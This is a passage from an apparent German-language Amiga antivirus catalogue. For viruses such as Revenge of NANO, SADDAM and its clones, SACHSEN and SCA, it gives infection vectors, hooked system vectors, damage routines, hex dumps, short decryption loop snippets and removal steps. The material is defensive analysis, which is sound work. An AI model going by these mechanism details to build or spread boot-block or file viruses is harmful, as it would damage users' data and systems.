  3994.         tarnt sich als Disk-Validator
  3995.         KickTag, KickCheckSum, BeginIo und andere
  3996.         zu erkennen an: hat im Gegensatz zum Orig.Disk-Validator keinen
  3997.         lesbaren ASCII-Text
  3998.         Schaeden in Abhaengigkeit von der Zeit:
  3999.          a) bestimmt eine Blocknummer ueber $DFF007 und schreibt 64 x
  4000.             LAMER!!! hinein
  4001.          b) Fastformatroutine fuer alle Laufwerke und ueber DisplayAlert
  4002.             Textausgabe:
  4003.             The Return Of The Lamer Exterminator
  4004.          c) schreibt den falschen Disk-Validator auf Disk
  4005.  
  4006.    - Revenge Bootloader!  Begin, KickTag, KickCheckSum, Vec5
  4007.         Fastmem: nein
  4008.         Vermehrung ueber BB
  4009.  
  4010.    - Revenge V1.2       cool,doio,vec5 , im Speicher immer $7e000
  4011.         und Speicherstelle $C0-$FF (Gefahr fuer setpatch-Liste)
  4012.         Vermehrung: ueber BB
  4013.         Schaden: nach einger Zeit neuer Mauszeiger
  4014.         im BB sichtbar: Revenge V1.2GCount:
  4015.  
  4016.    - Revenge of NANO  Typ A   Virus    File
  4017.          Laenge: 1412 Bytes
  4018.          Liegt mit unsichtbarem Filenamen ($A0A0) im Root-Verzeichnis.
  4019.          Verbogene Vektoren: Cool, OldOpenLib
  4020.          Die startup-sequence wird IMMER 3008 Bytes lang.
  4021.              Probleme deshalb siehe bei Typ B
  4022.          Im File ist zu lesen:
  4023.             61727900 000151f0 00000000 3aa0a000 ary...Q.....:...
  4024.                                        ^^^^^^
  4025.             3a732f73 74617274 75702d73 65717565 :s/startup-seque
  4026.             6e636500 a0a00a0a 49206861 74652043 nce.....I hate C
  4027.             6f6d6d6f 646f7265 20212121 00005265 ommodore !!!..Re
  4028.             76656e67 65206f66 204e414e 4f202121 venge of NANO !!
  4029.             210000c8 0a2e2e2e 616e6f74 68657220 !.......another
  4030.          Das Programm meldet sich in Abhaengigkeit von einer Zaehlzelle:
  4031.             #50 = DisplayAlert
  4032.             #100 = SetWindowTitle
  4033.  
  4034.    - Revenge of NANO  Typ B   Virus    File
  4035.          Laenge: 2400 Bytes
  4036.          Liegt mit unsichtbarem Filenamen ($A0A0) im Root-Verzeichnis.
  4037.          Verbogene Vektoren: Cool, DoIo, $6c, open, Lock, Loadseg
  4038.                              Openwindow
  4039.          Die startup-sequence wird IMMER 3008 Bytes lang.
  4040.             startup-sequence
  4041.             0000: a0a00a0a 203b636c 730a0a00 00000000 .... ;cls.......
  4042.                   ^^^^^^^^ ;unsichtbar immer 1. Zeile
  4043.             0010: 00000000 00000000 00000000 00000000 ................
  4044.                    ;usw.
  4045.          Probleme dadurch:
  4046.            - auf der Disk war zuwenig Platz => Aerger
  4047.            - Die Ursprungs-startup war laenger. Der Rest wird einfach
  4048.              abgeschnitten.
  4049.            - Die Ursprungs-startup war kuerzer. Der Rest wird aufgefuellt.
  4050.              z.B. mit Nullen siehe oben
  4051.              Einige Editoren kommen mit so einem File nicht zurecht.
  4052.              Kopieren Sie das File in die RAM. Protect-Flags aendern sich.
  4053.              Loeschen Sie das File auf Disk. (nicht ueberschreiben!!)
  4054.              Loeschen Sie die erste Zeile ($A0A0,0a,0a). Kopieren Sie
  4055.              Sie das File von RAM nach DF0 .
  4056.          Das Programm meldet sich in Abhaengigkeit von einer Zaehlzelle
  4057.              (#50, #100, #150):
  4058.              50: = DisplayAlert
  4059.                 ...another masterpiece by N A N O !!!
  4060.                    GREETINGS TO:
  4061.                 1 Byte Bandit, Byte Warrior,DEF JAM, DiskDoctors
  4062.                 B FANTASY, Foundation For The Extermination Of Lamers,
  4063.                 N I.R.Q. Team, Obelsik Softworks Crew, S.C.A., UNIT A ...
  4064.              100: = aendere windowtitle und screentitle
  4065.                      "I hate giants !!!",0
  4066.                      "Revenge of NANO !!!",0
  4067.              150: Fenster oeffnen
  4068.                "CON:10/20/600/140/ some melancholics ...",0"
  4069.                " ",0a
  4070.                "   The Life is beautiful !",0a
  4071.                " ",0a
  4072.                "   The Life is awful !",0a
  4073.                " ",0a
  4074.                "   The Life is a Fun !",0a
  4075.                " ",0a
  4076.                "   The Life is a Pain !",0a
  4077.                " ",0a
  4078.                "   But only the death is the way you should join in ! ",0a
  4079.           Fileauszug (Texte sind nicht codiert):
  4080.               00003aa0 a0003a73 2f737461 72747570 ..:...:s/startup
  4081.               2d736571 75656e63 6500a0a0 0a0a434f -sequence.....CO
  4082.                    ;......          ^^^^^^^^^
  4083.               69616e74 73202121 21005265 76656e67 iants !!!.Reveng
  4084.               65206f66 204e414e 4f202121 210000c8 e of NANO !!!...
  4085.           Hinweis 1: Vt versucht alle Vektoren zurueckzusetzen. Ueberlegen
  4086.           Sie aber bitte, ob Sie nicht doch zur Sicherheit einen KRESET
  4087.           durchfuehren. Die Vektoren sind in sich verschachtelt.
  4088.           Hinweis 2:
  4089.           Falls das Virusfile ueber die startup-sequence aktiviert wurde,
  4090.           so haengt ein Lock (202 Objekt in use). VT gibt dann beim Loesch-
  4091.           versuch einen DosError aus. Booten Sie bitte dann von einer
  4092.           sauberen Disk neu und loeschen Sie das unsichtbare File von Hand.
  4093.           Bitte vergessen Sie nicht, die startup-sequence zu aendern.
  4094.  
  4095.  
  4096.    - Revenge of the Lamer   PrgFileVirus Laenge 4560 Bytes
  4097.                nur KRESET (Entschuldigung)
  4098.                es werden mir zuviele Zeiger verbogen (10!!)
  4099.                entschluesselt steht im Speicher:
  4100.                dos.library.graphics.library.intuition.library.
  4101.                trackdisk.device.DOS s/startup.sequence   usw.
  4102.                Name:$A0A0A0A0A0 steht im Hauptverzeichnis und
  4103.                1.Zeile Startup
  4104.                testet vor Vermehrung ob genuegend Platz auf Disk ist
  4105.                nach 6 Resets (denke ich), Formatieren aller eingelegten
  4106.                nicht schreibgeschuetzten Disks
  4107.                3 Seiten Alert-Meldung
  4108.  
  4109.    - Revenge of the Lamer 2
  4110.                PrgFileVirus   Laenge 4448 Bytes
  4111.                einige Write-Test-Routinen fehlen,
  4112.                sonst wie Revenge of the Lamer
  4113.  
  4114.    W A R N U N G: es ist mir beim Testen gelungen, Revenge of the
  4115.       Lamer 1 u. 2 so zu vermehren, dass SID und andere Prg.e die
  4116.       5 A0  n i c h t  anzeigen. Mein FileRequester auch nicht. Das
  4117.       VirusPrg. wird aber  a u c h  bei diesen Disks aktiviert und
  4118.       vermehrt sich !!!  Mit einem DiskMonitor kann das Prg. ge-
  4119.       funden werden. Bei meinem PrgTest erscheint dann:
  4120.                Rev. Lam. unsichtbar
  4121.       Dies ist kein Schwachsinn, sondern der Sachverhalt wurde von
  4122.       anderen Programmierern nach meiner Entdeckung gegengeprueft und
  4123.       eine Fehlfunktion bei ExNext KS1.3 entdeckt. Dieser Fehler ist
  4124.       bei KS2.0 behoben.
  4125.       (vgl. auch Fish 429  Dr.doc)
  4126.  
  4127.    - RIPPER             Programcode = Northstar, nur anderer Text
  4128.                         cool im Prg. DoIo  immer ab $7ec00
  4129.                         Vermehrung: BB
  4130.       Text (auch im BB sichtbar):ATARI KILLS COMMODORE! RIP! RIP THE RIPPER
  4131.       usw.
  4132.  
  4133.    - Riska   Forpib-Clone     s.o.
  4134.  
  4135.    - Rob Northern   File    Laenge: 2616    BGS9 Clone  s.o
  4136.          Rob Northern im File lesbar
  4137.          Anfaengeraenderung:      !!!!
  4138.          testet immer noch auf TTV1 obwohl nicht mehr vorhanden
  4139.          schreibt nur 2608 Bytes zurueck (Geruechte behaupten, dies
  4140.          waere die Originallaenge von BGS9 ???)
  4141.          vergisst 3F3 zu schreiben
  4142.          d.h. ein vermehrtes Prg ist NICHT mehr lauffaehig
  4143.          d.h. die startup-sequence einer verseuchten Disk bricht ab
  4144.          VT findet weiterhin BGS9 im Speicher.
  4145.          Bei BlockKette wird Rob nicht gefunden, da 3F3 fehlt.
  4146.          Ausbau mit FileTest.  Stand 14.03.92
  4147.  
  4148.  
  4149.    - Rude Xerox = DIGITAL AGE = Forpib-Clone
  4150.          nur Text geaendert
  4151.  
  4152.    - SACHSEN VIRUS NO.1    Cool, immer ab $78000
  4153.          fordert trackdisk.device
  4154.          BB-Teile codiert mit  move.b #$70,d0
  4155.                                add.b d0,(a0)+
  4156.          decodiert im Speicher: ** SACHSEN VIRUS NO.1 ** usw
  4157.          Vermehrung: BB
  4158.          sonst keine Schaeden und keine Meldung
  4159.          GURU-Gefahr: sobald das Virus im Speicher ist und ein RESET
  4160.          ausgefuehrt wird, wird CloseDevice verbogen. Mit FastMem ab
  4161.          $200000 dann GURU.
  4162.  
  4163.    - SACHSEN VIRUS NO.3    Cool, DoIo, Wait, immer ab $78000
  4164.          belegt Block 0-3  (d.h. ein File ab Block 2 wird auch zerstoert.
  4165.          Fordert trackdisk.device NICHT  (HD!!!!)
  4166.          Alle Texte codiert.
  4167.          Vermehrung: BootBlock 0 - 3
  4168.          Schaeden:
  4169.          Schreibt nach Block 880 (Root bei Disk) neuen Disknamen
  4170.             SACHEN NO.3 ON DISK !!!
  4171.          Schreibt in Block (abhaengig von $DFF006) 64 x SACHSEN3
  4172.          Sollte dieser Block in einem File liegen, so ist dieses
  4173.          File NICHT mehr zu retten.
  4174.          DisplayAlert und dann RESET
  4175.             SACHSEN VIRUS NO.3 in Generation :        is running...
  4176.                (bei mir Generation 23)
  4177.  
  4178.    - SADDAM HUSSEIN Bootblockvirus    (vgl. auch BlowJob)
  4179.          KickTag, KickCheckSum, im Prg. DoIo u. $6c, immer $7f000
  4180.          Taeuscht durch Text im Bootblock:
  4181.          A2000 MB Memory Controller V2
  4182.          Vermehrung und Schaden: Bootblock
  4183.          Sobald die Zaehlzelle den Wert $7530 erreicht hat, wird ein
  4184.          Programmteil mit subi.b #$71,D0 entschluesselt und mit display-
  4185.          Alert der Text ausgegeben:
  4186.           TOO BAD BROTHER ... SADDAM HUSSEIN STRIKES BACK !!!
  4187.           THE ONLY ESCAPE IS TO TURN THE POWER OFF !!!
  4188.  
  4189.  
  4190.    - SADDAM-VIRUS     Disk-Validator   Laenge:1848 Bytes
  4191.      VT versucht die Disk-Validator-Files zu unterscheiden:
  4192.        - SADDAM
  4193.           - verwendet sub #2,d0
  4194.                - verwendet IRAK  (decodiert: SADDAM VIRUS)
  4195.                    - verwendet 41fa000a
  4196.                        - schreibt nach DF0
  4197.                        - schreibt nach DF1  
  4198.                    - verwendet 41fa0010
  4199.                        - schreibt nach DF0
  4200.                        - schreibt nach DF1
  4201.                - verwendet:
  4202.                  363636a0, a0a0a0a0, HARD, KICK, LAME, LOOM, RISC, IRAN
  4203.                  NATO, 4711, AFFE
  4204.           - verwendet sub #3,d0
  4205.              SADDAM ][ (decodiert auch so zu lesen)
  4206.                - verwendet IRAK
  4207.                - verwendet 1.29
  4208.           - verwendet sub #2,d6
  4209.              SADDAM 7 (decodiert auch so zu lesen)
  4210.           - andere
  4211.               - 1234
  4212.               - LoopC.
  4213.               - RootFormat
  4214.           - in File
  4215.               - SnoopDos
  4216.               - zu langes File (14524)
  4217.        - ungewoehnliche Disk-Validator-Files (MUSS KEIN Virus sein !!!)
  4218.           - CD17BitD Disk2932
  4219.           - CD17BitD Disk2936
  4220.           - usw.
  4221.       KS2.04 und hoeher NEIN  (Disk-Validator liegt da im ROM)
  4222.       Festplatte NEIN  (es wird mit trackdisk.device gearbeitet)
  4223.       HINWEIS: wird manchmal von VirusX mit Australian Parasite
  4224.       verwechselt !!!!
  4225.       Das erste Virusprogramm, das mit 1 MB Chip, Kick1.3 und OHNE
  4226.       setpatch r einen Reset mit der Tastatur uebersteht !!!!!!!!
  4227.       Cold, BeginIo, Close im Trackdisk.device, Rasterstrahl $90(a6)
  4228.       im Prg. dann noch OpenWindow, InitResident, direkte Dos.lib-Ein-
  4229.       spruenge.
  4230.  
  4231.       entschluesselt im Speicher mit:    eor.b d0,(a0)+
  4232.                                          subq.l #2,d0
  4233.                                          dbra d1,loop
  4234.  
  4235.       Zum Verschluesseln eines neuen SADDAM-Disk-Validators wird
  4236.       ein Wert aus $DFF007 in d0 abgelegt.
  4237.  
  4238.       Speicherlage: SysStkLower - veraenderter Wert aus $DFF007 - Virus-
  4239.                     programmlaenge
  4240.  
  4241.       Name decodiert: " SADDAM VIRUS"
  4242.  
  4243.       Schaeden und Gefahren:
  4244.       Das Einlegen einer Disk mit ungueltiger BitMap genuegt,
  4245.       um SADDAM zu aktivieren !!!!
  4246.       abhaengig von der Zaehlzelle:
  4247.       KopfStep alle Laufwerke (Disk danach BAD) und DisplayAlert:
  4248.                             SADDAM-VIRUS
  4249.       Ueberschreibt jeden echten Disk-Validator auf einer ungeschuetzten
  4250.       Disk !!!!!
  4251.       Falls auf einer Disk kein l-Dir vorhanden ist, wird es erstellt
  4252.       und dann der verseuchte Disk-Validator hineinkopiert. Noch KEIN
  4253.       anderes Virusprogramm hat Unterverzeichnisse angelegt !!!!
  4254.       Sucht ueber den FileHeaderBlock den ersten FileDataBlock und
  4255.       schreibt in T.DATA das LWort IRAK . Der Rest des FileDataBlocks
  4256.       wird mit    eor.l d1,(a0)+
  4257.                   dbra d0,loop
  4258.               verschluesselt. Bei aktivem SADDAM-VIRUS wird statt IRAK
  4259.       der richtige Wert 8 angezeigt! (Taeuschung !! vgl. Lamergruppe,
  4260.       die sauberen BB vortaeuscht!)
  4261.       Schreibt manchmal in ROOT in $13c (=Zeiger auf BitMapBlock) den
  4262.       Wert Null. Mit Glueck finden Sie in $140 den Originalwert (abge-
  4263.       legt vom Virusprogramm) .
  4264.       Wenn Sie Pech haben, hat ein anderer Virusprogrammteil diese
  4265.       Stelle kurz danach auch auf Null gesetzt. Versuchen Sie dann mit
  4266.       einer Bootdisk den OriginalDisk-Validator zu starten oder versuchen
  4267.       Sie mit einem Disk-Monitor zu Fuss den BitMapBlock zu finden und
  4268.       wieder in $13c einzutragen. Oder lesen Sie BitMapTest.dok (11.07.91)
  4269.       Hinweis: Versuchen Sie bitte NICHT decode IRAK auf einem fms.device
  4270.          (Grund: phys. und logischer Block verschieden). Sie muessen
  4271.          IRAK auf einer Disk decodieren !!!!!
  4272.       Hinweis 2: Ich besitze inzwischen (21.10.91) einen SADDAM-Disk-
  4273.          Validator mit der Laenge: 1892 Bytes . Dieser Disk-Validator
  4274.          aktiviert sich trotz Null in $138 und $13c nicht, sondern der
  4275.          System-Requester erscheint !!!!
  4276.       Hinweis 3: Um IRAK-codierte Bloecke zu reparieren, verwenden Sie
  4277.          bitte BlockITest. Geht sehr schnell im Vergleich zum FileTest.
  4278.          Danke
  4279.       Hinweis 4  28.07.93
  4280.          WICHTIG !!!!!  Dieser Hinweis gilt NUR fuer KS1.3, da ab KS2.04
  4281.          der Disk-Validator im ROM sitzt.
  4282.          Es handelt sich um ein "brutales" Vorgehen, das Sie nur als
  4283.          letzte Rettung verwenden sollten.
  4284.          Mir wurde eine Disk zugeschickt, die neben dem SADDAM-Disk-Vali-
  4285.          dator auch noch jede Menge bad-HeaderKey-Fehler hatte. Der
  4286.          Bitmapzeiger war noch in Ordnung !!! und es waren noch keine
  4287.          Files codiert.
  4288.          Unter KS2.04 konnte das Virus-File ohne Probleme geloescht wer-
  4289.          den.
  4290.          Aber mit KS1.3 gab es Probleme wegen der anderen Fehler.
  4291.          Gefundener und mehrmals wiederholter Weg:
  4292.           - Man braucht KS1.3 (und nur dann kann dieser Weg notwendig
  4293.                                sein, zusaetzliche Fehler siehe oben)
  4294.           - Eine SCHREIBGESCHUETZTE Bootdisk mit sauberen Disk-Validator
  4295.           - Eine verseuchte Disk mit zusaetzlichen Fehlerquellen.
  4296.          Ablauf:
  4297.          Starten Sie VT
  4298.          Falls VT SADDAM im Speicher findet, loeschen.
  4299.          Dann RootblockTest
  4300.             - bei Bedarf Bitmapzeiger richten
  4301.             - Disk-Validator umbenennen in fal.DisV
  4302.          Dann BlockITest
  4303.             - sobald VT SADDAM findet
  4304.                  - zeigen
  4305.                  - loeschen  (Frage nach Filetest ignorieren)
  4306.          Dann BB->File->BB
  4307.             - Laufwerk waehlen
  4308.             - L waehlen
  4309.             - fal.DiskV anklicken
  4310.             - Delete
  4311.          Falls jetzt groessere Fehler ausser SADDAM auf der Disk sind,
  4312.          erscheint ein GURU. (Hat nichts mit VT zu tun, sondern mit
  4313.          dem Betriebssystem)
  4314.          Falls nur ein LW, Disk entnehmen und von sauberer Disk neu
  4315.          booten.
  4316.          SADDAM-Disk einlegen
  4317.          Requester erscheint und verlangt Bootdisk (wg.Disk-Validator).
  4318.          Bootdisk einlegen und wieder entnehmen.
  4319.          SADDAM-Disk einlegen und warten bis Licht ausgeht. Original-
  4320.          Disk-Validator behebt Fehler.
  4321.          VT-Disk einlegen und VT starten.
  4322.          SADDAM-Disk einlegen
  4323.          mit BB->File->BB  fal.DiskV loeschen. Geht jetzt OHNE GURU.
  4324.          Dieser Diskwechsel entfaellt bei 2 LWen. Legen Sie ihre
  4325.          Saubere Bootdisk in DF0 und die SADDAM-Disk in DF1 .
  4326.          Hinweis fuer Othmar: Die bad HeaderKey-Fehler werden behoben,
  4327.          wenn Sie jetzt alle Files von der ehemaligen SADDAM-Disk im
  4328.          Einzelfile-Copymodus (also copy df1: ram: all) ins RAM kopieren
  4329.          und dann wieder zurueck (copy ram: df1: all) .
  4330.          Nocheinmal !!! Dieser umstaendliche Weg war nur notwendig:
  4331.              - bei KS1.3
  4332.              - wegen der bad HeaderKey-Fehler
  4333.                (die gleiche Disk OHNE bad HeaderKey war auch unter
  4334.                 KS1.3 ohne Probleme zu bearbeiten. Also loesche
  4335.                 SADDAM-Virus mit FileTest !!!)
  4336.  
  4337.    - SADDAM-Clones  verwenden statt IRAK  LAME, LOOM, RISC,
  4338.          a0a0a0a0, 363636a0  usw.
  4339.          Testen Sie mit BlockITest und verneinen Sie decode und schauen
  4340.          sich den Block an. Langwort 0 enthaelt das Erkennungslangwort.
  4341.          Decode in BlockITest sollte richtig arbeiten. Falls nein, rufen
  4342.          Sie mich bitte an. Danke
  4343.    - SADDAM-Clones Teil2:
  4344.          Es sind einige Clones (z.B. SADDAM 2 u. 4  (Name nicht nachvoll-
  4345.          ziehbar) ) aufgetaucht, die als Disk-Validator etwas anders
  4346.          codiert sind. Sind von VT aber schon (l:Disk-Validator) beim
  4347.          Filetest als falsch erkannt worden. Naja jetzt hab ich sie und
  4348.          konnte einen Test durchfuehren. Danke
  4349.  
  4350.    - SADDAM-7 Disk-Validator
  4351.          Vermehrung mit KS1.3 als Disk-Validator: ja
  4352.          Codiert die Files nicht, sondern zerstoert die Files, indem
  4353.          SADDAM7! hineingeschrieben wird. Diese Files sind NICHT zu
  4354.          retten. Beim 2. Versuch ein anderes File zu laden und damit
  4355.          zu zerstoeren, habe ich IMMER den GURU3 gesehen. Das Teil muesste
  4356.          sich also sehr schnell verraten.
  4357.                      Block:     890
  4358.             0000: 53414444 414d3721 53414444 414d3721 SADDAM7!SADDAM7!
  4359.             0010: 53414444 414d3721 53414444 414d3721 SADDAM7!SADDAM7!
  4360.             0020: 53414444 414d3721 53414444 414d3721 SADDAM7!SADDAM7!
  4361.          VT kann deshalb nur File loeschen anbieten.
  4362.  
  4363.    - SADDAM-File  Laenge: 14524 Bytes   NICHT lauffaehig  Error 121
  4364.          Grund: Hunklaengenangabe immer noch $1c5 . Sofort loeschen
  4365.  
  4366.    - SADDAM ][  Disk-Validator  Laenge: 1848 Bytes
  4367.          Verhalten: s.o.
  4368.          Schreibt IRAK
  4369.          Aenderungen:
  4370.          Name: "  SADDAM ][  "
  4371.          andere Decodierroutine:
  4372.              z.B.   subq.l #3,d0  (Orig. subq.l #2,d0)
  4373.        Nachtrag 02.01.93: Clone aufgetaucht. Verwendet als Kennung 1.29
  4374.        Nachtrag 15.04.93: Mir wurde ein SADDAM ][ zugeschickt, der
  4375.          sofort mit GURU bei Benutzung antwortet. Ein Anfaenger, wahr-
  4376.          scheinlich mit Monitor-Kenntnissen, hat genau in der Codier-
  4377.          Routine zugeschlagen. Mit diesem Teil ist KEINE Verseuchung
  4378.          moeglich. Loeschen Sie das Teil aus L: und kopieren Sie den
  4379.          Original-Disk-Validator neu.
  4380.  
  4381.    - SADDAM-Clone besondere Art  Name geaendert in HARDEX VIRUS
  4382.          Soll statt IRAK  HARD  schreiben. Wie das gehen soll, ist
  4383.          mir aber noch nicht klar.
  4384.          Begruendung:
  4385.          Der Nachprogrammierer hat nicht nur Namen geaendert, sondern
  4386.          auch noch 'trackdisk.device' geloescht. Deshalb kann BeginIo
  4387.          nicht verbogen werden. Also keine Codierung eines Blocks
  4388.          moeglich. VT erkennt SADDAM . Bitte einfach loeschen.
  4389.      Nachtrag 05.03.93: es ist ein neuer Clone augetaucht.
  4390.          Laurin-Virus  Wird von VT als SADDAM-Clone erkannt.
  4391.          Blocklangwort: $a0a0a0a0
  4392.          Namensbegruendung: im Speicher ist decodiert zu lesen
  4393.            74726163 6B646973 6B2E6465 76696365 trackdisk.device
  4394.            00010820 4C617572 696E2056 69727573 ... Laurin Virus
  4395.          Behandlung: siehe bei SADDAM
  4396.      Hinweis 05.03.93: Falls Sie noch mit KS1.3 arbeiten, so kopieren
  4397.          Sie sich bitte einen ORIGINAL-Disk-Validator auf die VT-Disk.
  4398.          Die Arbeit wird erleichtert. Ich darf das nicht, da es sich
  4399.          um ein Commodore-File handelt.
  4400.      Nachtrag 28.03.93: es ist ein neuer Clone aufgetaucht.
  4401.          Animal-Virus  Wird von VT als SADDAM-Clone erkannt.
  4402.          Blocklangwort: $363636a0
  4403.          Namensbegruendung: im Speicher ist decodiert zu lesen
  4404.            74726163 6B646973 6B2E6465 76696365 trackdisk.device
  4405.            00010820 416E696D 616C2056 69727573 ... Animal Virus
  4406.          Behandlung: siehe bei SADDAM
  4407.      Nachtrag 09.04.93: es ist ein neuer Clone aufgetaucht.
  4408.          KICK-Virus  Wird von VT als SADDAM-Clone erkannt.
  4409.          Blocklangwort: KICK
  4410.          Namensbegruendung: im Speicher ist decodiert zu lesen
  4411.            6b2e6465 76696365 00010820 204b4943 k.device...  KIC
  4412.            4b202056 49525553 00000000 03f30000 K  VIRUS........
  4413.            00000000 00010000 00000000 00000000 ................
  4414.            01c50000 03e90000 01c55573 65204b69 ..........Use Ki
  4415.            636b7374 61727420 312e322f 312e3300 ckstart 1.2/1.3.
  4416.            00000000 00000000 00000000 00000000 ................
  4417.          Use Kick... ist uncodiert im Disk-Validator-File zu lesen.
  4418.          Behandlung: siehe bei SADDAM
  4419.      Nachtrag 18.04.93: es ist ein neuer Clone aufgetaucht.
  4420.          NATO-Virus . Wird von VT als SADDAM-Clone erkannt.
  4421.          Blocklangwort: NATO
  4422.          Namensbegruendung: im Speicher ist decodiert zu lesen
  4423.            74726163 6b646973 6b2e6465 76696365 trackdisk.device
  4424.            00010820 20204e41 544f2056 49525553 ...   NATO VIRUS
  4425.            00000000 03f30000 00000000 00010000 ................
  4426.            00000000 00000000 01c50000 03e90000 ................
  4427.            01c54772 65617465 73742048 756d616e ..Greatest Human
  4428.            20204572 726f7200 00000000 00000000   Error.........
  4429.          Greatest... ist uncodiert im Disk-Validator-File zu lesen.
  4430.          Behandlung: siehe bei SADDAM
  4431.      Nachtrag 15.05.93: es ist ein neuer Clone aufgetaucht.
  4432.          AFFE-Virus . Wird von VT als SADDAM-Clone erkannt.
  4433.          Blocklangwort: AFFE
  4434.          Im Speicher ist zu lesen:
  4435.            74726163 6b646973 6b2e6465 76696365 trackdisk.device
  4436.            00010820 476f7269 6c612056 69727573 ... Gorila Virus
  4437.            00000000 03f30000 00000000 00010000 ................
  4438.            00000000 00000000 01c50000 03e90000 ................
  4439.            01c52167 6e696874 6f6e2079 61732c72 ..!gnihton yas,r
  4440.            6165682c 65655300 00000000 00000000 aeh,eeS.........
  4441.          Man koennte auch Gorilla richtig schreiben.
  4442.      Nachtrag 18.05.93: es ist ein neuer Clone aufgetaucht.
  4443.          IRAN-Virus . Wird von VT als SADDAM-Clone erkannt.
  4444.          Blocklangwort: IRAN
  4445.          Im Speicher ist zu lesen: 
  4446.            74726163 6b646973 6b2e6465 76696365 trackdisk.device
  4447.            00010820 41796174 6f6c6c61 68766972 ... Ayatollahvir
  4448.            00000000 03f30000 00000000 00010000 ................
  4449.            00000000 00000000 01c50000 03e90000 ................
  4450.            01c56e61 6320756f 79207461 6877206c ..nac uoy tahw l
  4451.            6c61206c 6c696b00 00000000 00000000 la llik.........
  4452.          Ist schon schlecht, dass man mit einem Speichermonitor
  4453.          Virus abkuerzen muss, weil man nicht sagen kann, ob man
  4454.          das naechste Null-Wort noch verwenden darf. Meine
  4455.          Empfehlung: Gebts endlich auf. Jeder gesteht euch zu,
  4456.          dass ihr einen Satz fast vollstaendig richtig rueckwaerts
  4457.          schreiben koennt. Aber von Viren habt ihr KEINE Ahnung.
  4458.          Und ein AntiVirusPrg verwirrt ihr SO NIE.
  4459.      Nachtrag 24.05.93: es ist ein neuer Clone aufgetaucht.
  4460.          GRAL-Virus . Wird von VT als SADDAM-Clone erkannt.
  4461.          Blocklangwort: GRAL
  4462.          Im Speicher ist zu lesen:
  4463.            74726163 6b646973 6b2e6465 76696365 trackdisk.device
  4464.            00010820 486f6c79 4772616c 56697269 ... HolyGralViri
  4465.            00000000 03f30000 00000000 00010000 ................
  4466.            00000000 00000000 01c50000 03e90000 ................
  4467.            01c52120 6c6c6568 20656874 206f7420 ..! lleh eht ot
  4468.            79617720 65687400 00000000 00000000 yaw eht.........
  4469.      Nachtrag 07.08.93: es ist ein neuer Clone aufgetaucht.
  4470.          4711 oder Parfum-Virus. Wird von VT im Speicher und beim
  4471.          File- oder BlockITest, als SADDAM-Clone erkannt.
  4472.          Neu ist, dass das Teil mit Hunk-
  4473.          Lab an SnoopDos V2.1 gelinkt war. Lesen Sie unten bei
  4474.          SnoopDos-SADDAM-Virus
  4475.          Blocklangwort: 4711
  4476.            Block:     209
  4477.            34373131 0001a2d0 0001a201 0001a3e8 4711............
  4478.          Im falschen Disk-Validator ist nichts sinnvolles zu lesen.
  4479.          Im Speicher ist zu lesen:
  4480.            6b2e6465 76696365 00010820 50617266 k.device... Parf
  4481.            756d2056 69727573 00000000 03f30000 um Virus........
  4482.  
  4483.  
  4484.    - SAO PAULO Virus   BB   im Speicher immer ab $7FC00
  4485.          Cool $7FF3A  nach Reset DoIo  $7FF56   KS2.04: ja
  4486.          Fordert trackdisk.device NICHT .
  4487.          Namensbegruendung: im BB ist zu lesen
  4488.                   SA0 PAULO!
  4489.          Fast der ganze Block 0 ist leer (Taeuschungsversuch ???) .
  4490.          Der Virencode steht in Block 1.
  4491.          Das Virusteil meldet sich nie .
  4492.  
  4493.    - SARON        Es ist KEIN Virus
  4494.       Es ist ein XCopy 6.5 pro (Laenge: 27196 oder 28020) aufge-
  4495.       taucht, das beim Start im Cli zuerst in grossen Buchstaben
  4496.       SARON usw. ausgibt. Nach meiner Meinung enthaelt das File
  4497.       KEINEN Virus.
  4498.       VT bietet bei Filetest Ausbau an.
  4499.  
  4500.    - SATAN-Virus  BB  immer ab: $7CD30   Cool $7CDA6  im Prg DoIo $7CDD2
  4501.       Fordert trackdisk.device NICHT .
  4502.       Vermehrung und Schaeden: BB
  4503.       Der Text im BB wird NIE erreicht .
  4504.       Namensbegruendung: im BB ist zu lesen
  4505.            21212120 48696572 20737072 69636874 !!! Hier spricht
  4506.            20646572 20534154 414e2021 21212120  der SATAN !!!!
  4507.  
  4508.    - SATAN-Virus   anderer Name EXORCIST-Virus   siehe oben
  4509.       Bitte verwechseln Sie die beiden SATAN nicht.
  4510.  
  4511.    - SCA Dos Kill   siehe bei D&A Virus
  4512.  
  4513.    - SCA!  BB        im Speicher immer ab $7EC00
  4514.         Cool, DoIo
  4515.         Fordert trackdisk.device NICHT
  4516.         Testet aber auf DOS0
  4517.         Sichert seinen Speicherbereich NICHT !!!!!
  4518.         Mit nur 1MB Chip und KEIN Fastmem nach Reset deshalb (DoIo
  4519.         ist dann verbogen) Ueberschreibgefahr und damit GURU. Das
  4520.         liegt NICHT an VT, sondern kann mit anderen grossen Programmen
  4521.         genauso nachvollzogen werden !!!! Ohne Virus im Speicher muss
  4522.         auch mit nur 1MB Speicher der BB sicher erkannt werden.
  4523.  
  4524.    - SCA 2  keine Gefahr, nie bootfaehig, immer GURU
  4525.          deshalb in meinem Prg. nur Nicht-Standard-BB
  4526.          Begruendung: read $200 nach $7FC00 von Zylinder 79 und
  4527.                       dann jmp $7FA00 (alles klar Anfaenger !!)
  4528.  
  4529.    - SCA-666  BB   Clone s.o.
  4530.          Nur Text geaendert
  4531.            20212121 8c783216 416e7469 63687269  !!!.x2.Antichri
  4532.            73740069 7320636f 6d6d696e 67208232 st.is comming .2
  4533.            3216616e 64207275 6c657320 74686520 2.and rules the
  4534.            6d616e6b 696e6421 dc6e0000 4ef90000 mankind!.n..N...
  4535.            00004120 36363620 36363620 36363620 ..A 666 666 666
  4536.  
  4537.    - SCA-Baltasar  BB   Clone s.o.
  4538.          Nur Text geaendert 
  4539.            20202c20 8c783216 42616c74 61736172   , .x2.Baltasar
  4540.            2d566972 75732031 39393420 20208232 -Virus 1994   .2
  4541.  
  4542.    - SCA KarlMarx  BB  Clone  s.o.
  4543.          Nur Text geaendert
  4544.            32166672 6f6d204b 61726c20 4d617278 2.from Karl Marx
  4545.            2056492e 20202021 dc6e0000 4ef90000  VI.   !.n..N...
  4546.            00006663 6b75756f 7920636b 6679756f ..fckuuoy ckfyuo
  4547.  
  4548.    - SCA-MAX-Virus BB  Clone  s.o.
  4549.            6f732e6c 69627261 72790000 44454154 os.library..DEAT
  4550.            4820464f 52205654 20424144 45535420 H FOR VT BADEST
  4551.            4c414d45 52202021 21212020 20d2aa2d LAMER  !!!   ..-
  4552.              ;.....
  4553.            32162047 72656574 73206672 6f6d204d 2. Greets from M
